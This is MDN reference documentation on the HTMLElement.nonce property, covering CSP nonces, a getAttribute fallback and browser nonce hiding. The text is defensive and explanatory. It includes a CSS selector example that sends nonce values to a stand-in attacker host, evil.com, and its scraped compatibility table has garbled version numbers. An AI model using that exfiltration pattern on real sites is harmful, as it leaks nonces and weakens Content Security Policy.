This feature is well established and works across many devices and browser versions. It’s been available across browsers since March 2022.
The nonce property of the HTMLElement interface returns the cryptographic number used once that is used by Content Security Policy to determine whether a given fetch will be allowed to proceed.
In later implementations, elements only expose their nonce attribute to scripts (and not to side-channels like CSS attribute selectors).
In the past, not all browsers supported the nonce IDL attribute, so a workaround is to try to use getAttribute as a fallback:
let nonce = script["nonce"] || script.getAttribute("nonce");
However, recent browsers version hide nonce values that are accessed this way (an empty string will be returned). The IDL property (script['nonce']) will be the only way to access nonces.
Nonce hiding helps prevent attackers from exfiltrating nonce data via mechanisms that can grab data from content attributes like this CSS selector:
script[nonce~="whatever"] {
background: url("https://evil.com/nonce?whatever");
}
| Specification |
|---|
| HTML> # dom-noncedelement-nonce> |
| Desktop | Mobile | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|
| Chrome | Edge | Firefox | Opera | Safari | Chrome Android | Firefox for Android | Opera Android | Safari on IOS | Samsung Internet | WebView Android | WebView on iOS | |
nonce |
61 | 79 | 75 | 48 | 15.410–15.4The property is defined only for its useful elements:<link>, <script>, and <style>; it is undefined for all other elements. |
61 | 79 | 45 | 15.410–15.4The property is defined only for its useful elements:<link>, <script>, and <style>; it is undefined for all other elements. |
8.0 | 61 | 15.410–15.4The property is defined only for its useful elements:<link>, <script>, and <style>; it is undefined for all other elements. |
© 2005–2025 MDN contributors.
Licensed under the Creative Commons Attribution-ShareAlike License v2.5 or later.
https://developer.mozilla.org/en-US/docs/Web/API/HTMLElement/nonce